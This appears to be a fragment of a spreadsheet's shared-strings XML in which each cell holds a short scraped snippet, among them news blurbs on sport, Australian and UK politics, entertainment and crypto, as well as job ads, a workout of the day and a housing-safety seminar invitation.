    <t>On the 21st November our first Customer &amp; Building Safety Seminar will take place at The House of St Barnabas in London. Bringing together industry experts, the event will be an opportunity to discuss how the housing sector is tackling compliance and why it is no longer enough. Sector experts and colleagues will be talking about the journey to move Registered Providers beyond straightforward statutory compliance to a more comprehensive Customer &amp; Building Safety Service providing safer homes for residents. Lively presentations are set to include: The Hyde Group’s story on how they are managing fire safety beyond just statutory compliance Origin Housing’s view on recruitment and ensuring that the sector is hiring and developing the right skills for the future. And our view on why compliance is simply no longer enough. Pledging to deliver safer homes Whatever stage you are at in your journey, we’d welcome your attendance and input into how we can pledge, as a sector, to make sure that we are delivering safer homes Venue: The House of St Barnabas, London, W1 Date: Thursday 21st November Times: Registration &amp; Coffee 2.00pm – 2.30pm Seminar: 2.30pm – 4.45pm Networking Drinks 4.45pm – 6.00pm. Cost: This is a free event, however there will be an opportunity to find out more about how your organisation can support The House of St Barnabas and donations are appreciated. The House of St Barnabas is a unique charity supporting homeless people by helping them into lasting employment through training and work experience in a not-for-profit private members club. Places are extremely limited. To register your interest please email hello@manifestconsulting.co.uk The post Manifest to host first ever Customer &amp; Building Safety Seminar: Why compliance is no longer enough! appeared first on Manifest Housing.</t>
  </si>
  <si>
    <t>CEO faces quick backlash over highlighted policies, including on hate speech and voter suppressionMark Zuckerberg touted Facebook as a champion of “free expression” in a wide-sweeping speech, offering a staunch defense of the social media giant following several rocky years characterized by allegations against the platform of censorship and bias.Speaking at Georgetown University on Thursday, the Facebook CEO invoked Frederick Douglass, Martin Luther King Jr and Black Lives Matter as a means of positioning Facebook as a champion for freedom of speech. Continue reading… Read More</t>
  </si>
  <si>
    <t>Hi, SurfSide Landscaping is currently hiring a lawn and garden maintenance worker. Experience would be considered an asset. Duties will include: Lawn cutting, shearing, line trimming, weeding, pruning and blowing. Vehicle will be required because properties are not on bus routes. Most work will be in the west shore area. Compensation is based on experience. .. Read more</t>
  </si>
  <si>
    <t>The driver was fatally injured when the car overturned and burst into flames in Taunton. Read more? Click here</t>
  </si>
  <si>
    <t>Ida H posted a photo: Prints | Website Recent Uploads tagged sigma</t>
  </si>
  <si>
    <t>Little Group Chairman Paul Little has launched a mentorship group for startup companies called Scholata "to take people with great ideas and help them commercialise." It's typically an area that's fraught with danger and we think we could have real value there," he said. Seed-funding in Australia has gone down by two-thirds in a year. "There was a lot of interest in startups two years ago... it is a danger from an investment point of view... not earning income, does not have the reputation and is a concept more than anything, " Mr Little said. Paul Little led a management buyout of Toll holdings and grew it from an 18 truck operation to a transport and logistics enterprise worth more than $4 billion. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Paradox Interactive has announced a new free extension for Imperator: Rome. The Punic Wars content pack covers one of the bloodiest and most exciting eras of Roman history: its brutal rivalry with Carthage in Sicily and, ultimately, its control over the Mediterranean. The trailer advertisement contains a narration from the Carthaginian point of view. "For centuries, Carthage was the protector of Sicily, the guardian of his liberties against Greek tyrants," sums up the voiceover. "And now, Rome claims the same right. Carthage can not tolerate a competitor in Sicily – it's time to go to war. " Indeed, that's it. The three Punic wars have been extremely costly for both sides. Rome would eventually win the victory after Scopio Aemilianus was sacked by Carthage, but not before Hannibal invaded Roman territory by marching his army and war elephants over the Italian Alps. These wars took place between 264 and 146 BC. BC and were one of the greatest armed conflicts the world has ever known at the time – making it an ideal food for Paradox's great strategy games series. Here is the teaser: There is still not much concrete information on the content pack. However, Paradox says it will be a free update and that it will include brand new historical missions for Rome and Carthage, new music and two new models of units. Personally, I am very happy to see how Hannibal's adventures in Hispania and Italy unfold and how Imperator manages his invasion of Roman territory. It was a dramatic era and Roman historians have described it with a mixture of fear and terror. PDXCon contains many more news this weekend, including the announcement of Crusader Kings 3, the new downloadable content for Stellaris, a new extension for Age of Wonders: Planetfall, and more. INFO Buy now</t>
  </si>
  <si>
    <t>As the latest season of Cirque du Soleil makes its debut on Australian shores, Rima Hadchiti brings "high class" to an industry she has long avoided.</t>
  </si>
  <si>
    <t>This is a match preview ahead of Arsenal's Premier League clash with Bournemouth at the Emirates including team news, line-ups and predicted score</t>
  </si>
  <si>
    <t>Robert Verkaik</t>
  </si>
  <si>
    <t>The assassination of the Swedish prime minister in 1986 remains unsolved, but files from a famous novelist’s archives could help The post How novelist Stieg Larsson may have cracked Europe’s biggest murder mystery 33 years after the death of Swedish PM Olof Palme appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Peter Brings His Family On A Guys Trip | Season 18 Ep. 1 | FAMILY GUY The post Peter Brings His Family On A Guys Trip | Season 18 Ep. 1 | FAMILY GUY appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Euclid Police Officer George Harper’s feet nearly reached the ground as he took a pony ride during a Justice 4 Aniya Foundation event in Euclid, Ohio, on September 28. Fellow Euclid officer Louis Catalani can be heard in the background teasing Harper, claiming the pony deserves an extra carrot, and that the ride will break the pony’s back and bring an end to its law enforcement career. The ride was filmed and posted to the department’s Facebook page. According to its GoFundMe page, the Justice 4 Aniya Foundation “is committed to raising awareness of child abuse issues and victims failed by the system meant to protect them.” The second-annual event was held to commemorate Aniya Garrett’s birthday, according to a Facebook event page. Four-year-old Garrett was killed in March 2018. Her mother and her mother’s boyfriend were both sentenced to life in prison in March 2019 for her murder. Credit: Euclid Police Department via Storyful</t>
  </si>
  <si>
    <t>Karen Percy</t>
  </si>
  <si>
    <t>A Melbourne court is told Phillip Galea was preparing a document which he hoped would lead to "thousands upon thousands" of terrorist acts because of a perceived threat from Muslims and the political left.</t>
  </si>
  <si>
    <t>Steve Bruce has admitted he would’ve tried to keep Mo Diame at Newcastle had he arrived at the club earlier this summer. The Senegalese midfielder ended up completing a move to Qatar after his contract expired in late June, but it seems Steve Bruce would’ve been very keen to keep him on Tyneside had he been given half the chance. Here’s what he’s had to say about big Mo – someone he describes as a ‘very, very good player’ who he enjoyed working with during his time at Hull: “I enjoyed working with Mo Diame,” “He was excellent for me and I believe he was excellent here. A very, very good player. “But it was done and dusted before I came here. “Certainly had I been here I would have tried to keep him. “He’s a good player.” It’s easy to say now, but I was always keen for us to hand Diame a new deal to keep him at the club another season or two. Yes he was getting on and there were signs his best days were behind him, but he was a strong character, had invaluable Premier League experience and moulded himself into a solid and tough tackling defensive midfielder – something we have very few of. With Isaac Hayden now set to miss our next 3 games after that reckless red card at Leicester, how we could use someone like Diame to plug the gap.. (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>"I'm not going anywhere", CEO Ahmed Fahour tells staff after shelving the financial firm's $3.2 billion IPO and his $22.5 million share bonus.</t>
  </si>
  <si>
    <t>President Trump told reporters at the White House Friday that the U.S. and China had come to an agreement on "phase one" of a trade deal. Photo: Michael Reynolds/Shutterstock</t>
  </si>
  <si>
    <t>Dua Lipa will wow crowds with a live concert on a purpose-built stage on the water at the stunning seafront destination, with an array of additional entertainment, food and beverage deals and free transport for show-goers. Dua Lipa headed to the Pointe in November The post Dua Lipa headed to the Pointe in November appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Personal Assistant – Secretary *Immediate Start Possible , = (2) Personal Assistant Positions Available Div1 -General Freight &amp; Salvage. Div2- 18+specialtystore.more …will explain when talk. Full Time &amp; Part Time Positions Monday – Saturday $20.00 Hour Income. Paid *cash bi-weekly. 40 hour week + possible. Owner willing to train Personal Assistant on all aspects of .. Read more</t>
  </si>
  <si>
    <t>As Moira Barton (played by Natalie J Robb) and Nate Robinson (Jurell Carter) have continued their secret affair behind Cain’s (Jeff Hordley) back, it looks like the walls are closing in, after Pete Barton (Anthony Quinlan) discovered the truth about what the pair had been up to. Now, it seems they don’t have long left, as things are set to reach a climax in the next couple of months. Speaking to Express.co.uk at The Inside Soap Awards, actress Sally Dexter, who plays Cain’s mum in the soap, quickly drew attention to the: “Very explosive situation with my son, my daughter in law, and the farmhand – the mystery man!” It looks as though she will be heavily involved as Moira and Nate’s affair finally comes to light. She confessed that: “Faith would fight tirelessly for Cain, she would absolutely, yeah, she would, she’d fight anything for him.” READ MORE: Emmerdale spoilers: Faith Dingle in major new gangster plot? Will Faith turn violent towards Nate in her son’s defence? Sally continued: “To find out that anybody would have cheated on him, is something that she can’t quite comprehend, because she knows that Cain and Moira have been so right for each other.” She revealed how her character would also find it difficult to learn of her daughter in law’s infidelity, saying that: “She’s desperately upset about it, she loves Moira too as a daughter!” As things are set to hot up very soon, Sally admitted that the situation with her son will be so devastating that she may end up having to leave the Dales. “It was extraordinary,” she continued. Sally also stated that her experience of playing a Dingle was: “Like a little bit of royalty, it’s fantastic!” As Pete Barton is set to leave the soap in upcoming months, will Cain and Faith get revenge after they discover that he knew about Moira and Nate’s affair? In scenes set to air next week, it seems as though Faith might start to have her suspicions about her daughter-in-law. As Nate has already threatened Pete this week over revealing the truth, Faith may be the next to watch out for as she may rumble their affair. Next week, as Faith plans a romantic lunch for Cain and Moira, things unfortunately don’t go to plan, leading Moira to unsurprisingly go off with Nate instead. As her son is left frustrated by Moira’s sudden disappearance, she thinks Pete may be to blame. When she notices him having a sneaky conversation with Moira, will she learn the truth about the affair? Emmerdale continues tonight at 8pm on ITV. Source link</t>
  </si>
  <si>
    <t>She’s lying.</t>
  </si>
  <si>
    <t>Holiday Inn-owner InterContinental Hotels Group blamed lower business bookings in China and protests in Hong Kong for a 0.8% fall in quarterly revenue per room on Friday, the latest company to be pinched by weaker global travel.</t>
  </si>
  <si>
    <t>submitted by /u/melonpicker [link] [comments] Apple removes Quartz news app from the Chinese App Store over Hong Kong coverage</t>
  </si>
  <si>
    <t>More than 250 people have asked police to investigate whether their partner has a violent history – and 15 were deemed at such risk that authorities urgently intervened.</t>
  </si>
  <si>
    <t>We are actively seeking new salespeople to join our top producing team. We are looking for highly motivated and committed Real Estate Professionals to join our team. Newer or more seasoned agents are welcome to apply! We have a proven history of success in Etobicoke and the surrounding communities. We are committed to our agents .. Read more</t>
  </si>
  <si>
    <t>A police officer who was seriously injured in a suspected hit-and-run has come out of a coma and is breathing on his own. Read more? Click here</t>
  </si>
  <si>
    <t>Where did Evan Longoria rank among MLB third basemen in 2019? CINCINNATI, OH – MAY 03: Evan Longoria #10 of the San Francisco Giants hits a solo home run to break a tie game in the 11th inning against the Cincinnati Reds at Great American Ball Park on May 3, 2019 in Cincinnati, Ohio. The Giants won 12-11 in 11 innings. (Photo by Joe Robbins/Getty Images) After a disappointing first season with the San Francisco Giants, Evan Longoria had a far more productive 2019 campaign. Rather than kicking off a rebuild, the San Francisco Giants took an aggressive approach to the 2017-18 MLB offseason, acquiring former All-Stars Andrew McCutchen and Evan Longoria. While McCutchen was just a rental, Longoria was a long-term investment under contract through the 2022 season. Unfortunately, the 2018 season did not go as hoped, and Longoria was part of the problem with a disappointing .244/.281/.413 line and 16 home runs in 512 plate appearances The 34-year-old quietly enjoyed a nice bounce-back season in 2019, though he was still not the same dynamic player we saw in his prime. While he served as the team’s primary third baseman, Pablo Sandoval (45 games), Zach Green (5 games), Cristhian Adames (3 games), Corban Joseph (2 games), Donovan Solano (2 games) and Yangervis Solarte (2 games) also saw time at the hot corner. All told, San Francisco Giants third basemen finished the season with a .258/.323/.448 line and a .771 OPS that ranked 17th in the majors. While that one all-encompassing offensive statistic tells us that the Giants were near the middle of the pack at the position, what we set out to answer was where Longoria ranked individually. For the sake of this exercise, we limited the field of players under consideration to guys who spent at least 51 percent of their time at the third base position and also tallied at least 150 plate appearances. That narrowed the field to just 43 players and ahead is a rundown of where Evan Longoria ranked among that group in a number of statistical categories. Original Source Follow us on Twitter Amazon’s 30-Day FREE Trials The post Where did Evan Longoria rank among MLB third basemen in 2019? appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>mlb2309</t>
  </si>
  <si>
    <t>Ultimate Ears Power Up Dock on sale at JB Hi-Fi, and also Amazon, for $29, normally $49.95. Enjoy wireless charging with POWER UP Charging Dock. Charge-n-go with BLAST, MEGABLAST, BOOM 3 and MEGABOOM 3 speakers. Continue to blast tunes or use Amazon Alexa all while charging Stunning design Convenient Home Base</t>
  </si>
  <si>
    <t>The 3 ways Frank Lampard could solve his latest N’Golo Kante injury problem at Chelsea Original Source N’Golo Kante suffered another injury set-back this weekend when the Chelsea star pulled out of France’s match with Iceland. The 28-year-old was named in the starting XI for the game, put felt a groin issue during the warm up and was pulled out of the team just before the start. “He felt a pain in the adductor [groin] muscle,’ said the France boss after the match. ‘He had a feeling where he did not feel comfortable to play,” France head coach Didier Deschamps said. “I made the decision [to pull him from the squad], because maybe it could get even worse. I knew Moussa [Sissoko] would be ready. Read More “I do not think it’s too serious for NG [Kante], but I do not have an answer tonight.” The French have one more match this week, against Turkey, before Kante will return for Chelsea’s busy schedule once again. The Blues face Newcastle United before a huge Champions League clash at Ajax in Amsterdam. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel Play now Even though the injury is not too serious, it means Lampard might have be careful with his star man, so what are the different formations and ways that Lampard can rest Kante. 4-2-3-1 With the injuries to Callum Hudson-Odoi and Willian now subsiding, Lampard’s preferred formation can start to be used to some effect. In the win over Southampton, the Blues boss brought back the 4-2-3-1, with Mason Mount playing just behind Tammy Abraham and Hudson-Odoi and Willian on either flank. It allowed Jorginho and Kante to play together in the middle of the park, with the Blues having decent balance throughout the team. If Kante is unavailable for the Newcastle game, then it could be a straight swap with Mateo Kovacic, with the Croatian looking to fill the Frenchman’s boots in the position. Read More 4-3-3 Another way that Lampard has set up his side has been the 4-3-3, similar to the way that Maurizio Sarri would play. With Kante on the right of the three, it has been either Ross Barkley or Kovacic on the left, but that could change if Kante is out. As more forwards are available, then it could mean that Mount drops into a slightly deeper position off the left and look to create from there. That would mean Jorginho plays in the centre and either Kovacic or Barkley on the right of the three. Read More 3-4-3 Lampard sprung a surprise against Wolverhampton Wanderers when he played three at the back, something he has repeated a couple of times afterwards. The formation gives the Blues more of a structure defensively, and the three at the back could be the way to go if he doesn’t have Kante at his disposal. Stay up to date with all the latest with all the latest Chelsea news from Oliver Harbord and the team at football.london across our social media channels. Twitter: You can follow our dedicated Chelsea Twitter account, and our Chelsea correspondent Oliver Harbord. Facebook: You can follow our Chelsea page here. Instagram: Follow our Chelsea page here. WhatsApp: Click here to enroll or text NEWS to 07557204594 and then add the number to your phone contacts book as chelsea dot london (case sensitive, with spaces) to receive daily updates and breaking news from Oliver Harbord and the team on Chelsea. Your phone number won’t be shared with any other members of the group. Click here for more information on the service. It could mean Kovacic comes into the centre of midfield, with Jorginho keeping his place with the Croation. There would be more balance to the side, and the opportunity to allow the front three from being more creative.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The 3 ways Frank Lampard could solve his latest N’Golo Kante injury problem at Chelsea appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Educators and experts at The Age's school summit agreed cash alone could not attract top teachers to struggling schools.</t>
  </si>
  <si>
    <t>Tim Kelly fell nine votes short of taking the Geelong best-and-fairest back to Western Australia as Patrick Dangerfield was crowned the Carji Greeves medallist for a third time last night.</t>
  </si>
  <si>
    <t>But Ms McKay ruled out supporting any move to scrap sniffer dogs or decriminalise the personal use of illicit drugs</t>
  </si>
  <si>
    <t>Pioneering Australian screenwriter Reg Watson, who created Neighbours, Prisoner, The Young Doctors and Sons &amp; Daughters, has died aged 93. He died following a short illness. Watson is Australia’s most prolific creator of serial drama, with long-running shows produced at Grundy Productions becoming household names, enjoyed by millions in multiple territories around the world. Thousands of actors and crew have worked on dramas he created, with many gaining international success. 10’s Neighbours, originally created for the Seven Network, is his most famous creation. Due to mark 35 years in 2020, it is Australia’s all-time longest-running drama with a cavalcade of stars to its name including Kylie Minogue, Jason Donovan, Margot Robbie, Guy Pearce, Jesse Spencer, Alan Dale, Natalie Imbruglia, Liam Hemsworth, Delta Goodrem and more. Prisoner ran from 1979 – 1986 becoming a ground-breaking show for its ensemble of female actors and taboo subjects. The show drew viewers in the US and UK, with a diehard fanbase who still gather for reunions. It also inspired a hit reboot in Foxtel’s Wentworth reaching a new generation. The Young Doctors ran from 1976 – 1983 on Nine, The Restless Years from 1977 – 1981 on 10 and Sons and Daughters, largely created to appeal to viewers in both Sydney &amp; Melbourne, on Seven from 1981 – 1987. Jason Herbison Executive Producer at Neighbours said, “Everyone at Neighbours is sad to hear of the passing our our creator, Reg Watson. He was a pioneer of drama, prolific in his output and by all accounts a lovely person to work with. His legacy lives on in Ramsay Street to this day.” Writer Bevan Lee said “Reg Watson was a trailblazer in Australian commercial television drama. He also mentored many of its top writing and production talents over the years, including myself, John Holmes, Rick Maier, Sue Smith, Patrea Smallacombe, Greg Haddrick, Coral Drouyn, Jason Herbison and John Misto. He also gave a start to many actors who have gone on to tread the world stage, especially through his creation Neighbours. This, Sons and Daughters, Prisoner and The Young Doctors. What a creative legacy! Why is he NOT in the Hall of Fame?” TV historian Andrew Mercado said, “He was a very private man, which is a shame because he should have been put on a pedestal and received a lot of attention for the fact that so many of his ideas turned into such long-running hit shows. He should be in the Hall of Fame. “His shows had such a great core concept to them. Prisoner was a very brave show, ahead of its time. Sons &amp; Daughters was a brilliant way to overcome the Sydney-Melbourne rivalry by creating a premise situated in both cities. And the sheer Neighbours simplicity of it turned out to be very self sustaining.” Brian Walsh Executive Director of Television, said, “Reg was a gifted storyteller, but significantly his brilliant and creative mind gave life to so many Australian shows which have become folklore. I was fortunate enough to work with him on Neighbours and proud that at Foxtel we could continue his legacy with Wentworth -the reimagining of his brilliant signature work, Prisoner. He was a stalwart of the Australian television industry and we have lost a legend.” Watson grew up on a sugar farm in Queensland, before roles as a radio actor and later announcer. He moved to the UK in 1955 where he became Head Of Light Entertainment at ATV. He convinced Lew Grade to produce a new Midlands based soap opera which would become Crossroads. It ran from 1964–1988 before a revival from 2001–2003. Reg Watson with Noele Gordon He returned to Australia in 1973 to become head of drama at Reg Grundy Productions, creating Until Tomorrow (1975), The Young Doctors (1976), Glenview High (1977), The Restless Years (1977), Prisoner (1979), Taurus Rising (1981), Sons and Daughters (1981), Waterloo Station (1983), Starting Out (1983), Possession (1985) and Richmond Hill (1988). In 2010 Watson was given a Member of the Order of Australia for services to the media as a pioneer in the creation and production of serial television drama. He is yet to be inducted into the TV Week Logie Hall of Fame. Source: ATV Today, Wikipedia</t>
  </si>
  <si>
    <t>Newcastle host Manchester United in the final Premier League match of the weekend – and Express Sport brings you live updates from St James’ Park. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>WA doctors are demanding changes to draft euthanasia laws to bring its safeguards into line with those contained in Victoria's legislation.</t>
  </si>
  <si>
    <t>The protests have paralysed Ecuador's economy and cut off more than half of the country's production of oil, Ecuador's most important export.</t>
  </si>
  <si>
    <t>Last ever episode with Aidan Turner &amp; Eleanor Tomlinson. 8:20pm Saturday on ABC. Saturday Night Live Movie: The Program Deep Water Macgyver Escape to the Country</t>
  </si>
  <si>
    <t>Rebecca Carmody</t>
  </si>
  <si>
    <t>A WA mother is vowing to move interstate with her four-year-old son, splitting him up from his sister, if education authorities refuse her requests for him to start school a year later because he "won't cope".</t>
  </si>
  <si>
    <t>Storj has seen over 60% price increase at some point today, resulting in the crypto community thinking the digital asset is preparing for a listing on Coinbase. Although, today, Storj had traded at 65% price increase. However, as at the time of writing, Storj is changing hands at $0.266345 with over 31% value increase. The digital currency has since been switching between 82nd and 87th position in the coin market. Storj: How The Coinbase Rumour Started Early December, Coinbase listed Storj among some digital asset it plans to list in the future. Of the digital assets, there is high potential the respected exchange list Storj ahead of other digital currencies for so many reasons. During the announcement, Coinbase had stated clearly that to add new asset “requires significant exploratory work from both a technical and compliance standpoint”. In this regards, the team behind Storj have been working closely. Storj Lab’s Co-founder Presented At Coinbase In October, Stroj Lab Co-founder Shawn Wilkinson had a presentation at the Coinbase’s headquarters in San Francisco. The co-founder presented to Coinbase’s People of Color Employee Resource Group (ERG). Today, Storj’s @super3 spoke to @coinbase‘s People of Color Employee Resource Group about the history of Storj and our decentralized cloud storage platform. Thanks to the Coinbase team for hosting us and learning more about our project. pic.twitter.com/TmhsQseKFZ — Storj Labs (@storjproject) October 11, 2018 Storj Recruits Coinbase Executive Since December, Storj has been conversing with Katherine Johnson, Director of Compliance Regulation at Coinbase, until the team was able to recruit Katherine as a member of Storj Labs’ Board of Directors. A Little About Storj Storj launches with the aim of providing decentralised cloud storage to its community and thr world at large. The blockchain platform survives on the principle that each user is supposed to have equal amount of space on the network. While users rent out their space, they receive a certain amount for renting their extra disk space. Disclaimer: Our writers invest in cryptocurrencies and it is possible the author of this article has investment in any of the digital currencies discussed. Some times author’s presented information may be laced with opinions. Treat articles as mere information and not as financial advice. Don’t miss any of our crypto news, Join our Telegram | Facebook | Twitter.</t>
  </si>
  <si>
    <t>Yep, nah, nah, yep, nah. Angie Kent meets her very own team of players. 7:30pm Wednesday on 10. Struggle Street Julia Zemiro’s Home Delivery Gruen Love It or List It Australia The Flash</t>
  </si>
  <si>
    <t>Hello. I have a full time job but it is slow right now. I am looking for small local jobs in to help get me going right now. I am in the trades and I am Handy. I have my own tools and have a small pickup truck. I can do scrap metal pick up .. Read more</t>
  </si>
  <si>
    <t>How do you follow up a bogey-free, eight-under 63 in the first round of a PGA Tour Series-China event? If you’re Justin Shin of Maple Ridge, B.C., you go one better and fire a 62, which he did on Friday to take a five-shot lead into the weekend at the Macau Championship. With Shin at […]</t>
  </si>
  <si>
    <t>The upcoming exhibition ‘The Bees’ Knees’ is celebrating the role of the humble bumble bee in the environment.</t>
  </si>
  <si>
    <t>STATE PENSION payments increase in the UK and for expats living in some countries each year, under the triple lock policy. This week, the Department for Work and Pensions will send letters to thousands of pensioners regarding what will happen to the state pension should there be a no-deal Brexit. Daily Express :: Finance Feed</t>
  </si>
  <si>
    <t>Meghan Collie</t>
  </si>
  <si>
    <t>These seasonal veggies can make great side dishes for your turkey this weekend.</t>
  </si>
  <si>
    <t>Tuesday Grinder Metcon (AMRAP – Reps) AMRAP in 20 ( Pairs ) 60/50 x Cal row 50 x DB Push Press 40 x C2B Pull Ups 30 x Box jumps 200m x Farmers carry with PP Dumbells Rx 22.5/15kg *Score is total reps OPTIONS: PP : Reduce load / KB C2B : Chin over bar,... The post WOD WOD, October 15, 2019 appeared first on CrossFit Chamber.</t>
  </si>
  <si>
    <t>Likon47</t>
  </si>
  <si>
    <t>For anyone who missed out on the Kogan deal. Original Coupon Deal</t>
  </si>
  <si>
    <t>Last night saw unprecedented support for environmental leadership Toronto, October 4, 2019 -- Large crowds at last nightâs 100 Debates on the Environment across the country demonstrated that concern about the environment is fueling a powerful force that no party and no candidate can ignore in this election. Of the 104 confirmed debates nation-wide, 95 have taken plac...</t>
  </si>
  <si>
    <t>Hausa Korean Dictionary – travel dictionary to translate Hausa to Korean. Click on the list to show Hausa or Korean synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Hausa Korean Dictionary →</t>
  </si>
  <si>
    <t>James Forsyth</t>
  </si>
  <si>
    <t>‘It is definitely less than 50 per cent,’ says one Downing Street source when asked about the chances of a…</t>
  </si>
  <si>
    <t>5 Strikers Crystal Palace Should Target in the January Transfer Window Original Source Crystal Palace have had a much stronger start to the season than expected, collecting 14 points from their first eight games and currently sitting in sixth place in the league. However, as was the problem for the first half of the 2018/19 season, goals have been hard to come by for the south London side. So far they have only managed to find the net eight times in the league, and were it not for their stellar defence, they could have found themselves much further down the table. Jordan Ayew has been handy leading the line for the Eagles, but isn’t the stellar centre-forward they need, while Christian Benteke continues to look a shadow of his former self, scoring just four Premier League goals since August 2017. If Crystal Palace are to push on to the next level and begin battling for a place in Europe soon, they are in desperate need of a clinical finisher who can guarantee 15 goals a season. With the club moving away from the idea of hitting crosses to the target man as often as possible, Crystal Palace may well require a shorter, quicker striker who can fit in with a counter-attacking style. Here are five strikers Crystal Palace should target in January. Michy Batshuayi – Chelsea A likely first choice for the majority of Crystal Palace fans is last year’s loanee Michy Batshuayi. Mobile, selfless but also with a keen eye for goal, the Belgian ticks every box that Palace need up top. Batshuayi scored six goals in 13 games in all competitions last season, including five in the league for Roy Hodgson’s side having arrived on deadline day in January. His goals were responsible for Palace’s late push away from the relegation zone and into midtable. With game time at Chelsea limited and a reported fee of £22m being quoted for potential suitors, Batshuayi could very well return to Selhurst Park this season. Fyodor Chalov – CSKA Moscow Another name familiar to Crystal Palace fans is that of CSKA Moscow forward Fyodor Chalov. The Russian scored 15 goals in the league last year as well as gaining attention for his goals against Real Madrid in the Champions League group stage. Palace had a £23m bid for Chalov reportedly rejected on deadline day, and could return for the striker again this winter. He has started well again so far, scoring four goals and contributing three assists in the league and has no doubt cemented the south London club’s interest in him. He may take some time to adapt to the Premier League, but at just 21, he certainly has the time to do so. Gabriel Barbosa – Flamengo (on loan from Inter) Some may know the 23-year-old Gabriel Barbosa as a ‘wonderkid’ from Football Manager. Standing at 5’9″, the Brazilian forward has a reputation for being a flair player, less like a. traditional No. 9. Barbosa has had a tough time in recent years, with a move to Inter in 2016 not really working out for him. However, he’s found his feet back in Brazil, firstly with Santos and now with Flamengo. Barbosa’s loan contract with the latter is due to end on when the January window opens, and Palace may want to keep tabs on him. While he may take some time to adapt to the physicality of the Premier League, he would probably capable of thriving with tricky wingers such Andros Townsend and Wilfried Zaha around him. Francesco Caputo – Sassuolo At a mature 32 years, Caputo has found great success in front of goal in Serie A in recent years, having scored 16 in the league last year and already having scored three goals in five league games so far this season. A clinical finisher and capable of playing anywhere along the front line, Caputo could be exactly what the Eagles are looking for. Caputo has the ability to hold up the ball and link play well alongside a great finishing instinct. However, at 32, it may be too late for the Italian to arrive in the Premier League for the first time and adapt quickly enough to push Palace forward in half a season. Iago Aspas – Celta Vigo A familiar face to Premier League fans (though more for his novelty corner kicks than his goalscoring), Iago Aspas returned to hometown club Celta Vigo after leaving Liverpool in 2015. In that time, he has scored 76 goals in La Liga, hitting at least 20 goals in the last two seasons. As with Caputo, one of Aspas’ main strength is his ability to hold up the ball and bring others into play. The Spaniard is 32 now and would be seen as more of a short term signing from a Palace point of view, but it could prove to be a stroke of genius. In Aspas, you will get a team player, with an eye for goal who poses a danger from anywhere within 30 yards of goal. While his limited game time during his spell at Anfield could represent an inability to adapt to the league (that or he just wasn’t as good as Luis Suarez and Daniel Sturridge), it might be a roll of the dice that could pull Palace into the top half.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5 Strikers Crystal Palace Should Target in the January Transfer Window appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Walcott set for return to training after head injury Everton winger Theo Walcott is on course to return to training this week after being taken to hospital with a head injury. Walcott was discharged from hospital on Saturday following precautionary scans after suffering a blow to the head during Everton‘s 3-1 defeat against Manchester City. The 30-year-old blocked Raheem Sterling’s cross with his face and was carried off on a stretcher after lengthy treatment. Everton are following standard concussion protocols and have not ruled out Walcott rejoining the squad ahead of this weekend’s Premier League trip to Burnley. “Since his discharge, the club’s medical staff have continued to follow the standard concussion protocols with the forward,” an Everton statement said on Tuesday. “Walcott is on track in his recovery ahead of a potential return to full training later this week.” This post Walcott set for return to training after head injury appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>PRETORIA, South Africa — The president of South Africa vowed on Thursday that “early warning mechanisms” would be put in place to try to avoid further violence against immigrants in his country, after a serious of deadly attacks prompted anger from other African leaders and an extraordinary airlift of Nigerians. The South African leader, Cyril Ramaphosa, made the comments during a summit with his Nigerian counterpart, Muhammadu Buhari, who called the attacks “unacceptable.” At least 12 people were killed and more than 700 arrested after gangs in Johannesburg and Pretoria attacked foreign-owned stores and stalls, looting and burning the small businesses and attacking some shopkeepers. Outbreaks of violence against Nigerians and citizens of other African nations have regularly erupted in South Africa in recent years, with some in the country accusing foreigners of taking their jobs or of committing crimes like peddling illegal drugs. The attacks have led to a growing sentiment among Nigerians that South African companies should be prevented from doing business in Nigeria. Mr. Ramaphosa and Mr. Buhari lead Africa’s largest economies, and the two countries did $3.3 billion in trade in 2018. South Africa has been making efforts to repair ties after the government faced criticism for framing the violence against foreigners as everyday crime, and initially not speaking out against the xenophobia. Mr. Ramaphosa on Thursday again stressed the need for immigrants to obey local laws, but he called the targeting of foreigners “regrettable.” After the latest violence, the Nigerian foreign minister called the attacks “sickening” and the government recalled its high commissioner. South Africa temporarily closed its diplomatic missions in Nigeria, citing concerns over staff safety. In Lagos, Nigeria’s largest city, the operations of the South African telecommunications giant MTN were targeted in retaliatory attacks. Mr. Ramaphosa said his government was “totally committed” to tackling the violence against foreigners. He acknowledged South Africans’ frustration with the country’s high unemployment rate and sluggish economy, but urged his compatriots not to take it out on immigrants. It was not immediately clear what the early warning mechanisms would consist of or how they would work. Source link</t>
  </si>
  <si>
    <t>"We wanted to be playing a rugby game that day, but again, you can't fight Mother Nature and some things are more important than rugby."</t>
  </si>
  <si>
    <t>The veteran No.7 took a huge step up against Georgia on Friday night and is now central to the Wallabies' hopes of surprising England in the quarter-finals.</t>
  </si>
  <si>
    <t>Queensland Liberal National Party Senator Amanda Stoker says, "when governments do well, people prosper", as she offered an insight into her upbringing and lessons she learned that led her to a political career. "I observed my parents trying to run a small business... during the period of 18 per cent interest rates," she said. "It opened my eyes to the importance of politics and how policy affects regular people going about their lives." Image: News Corp Australia</t>
  </si>
  <si>
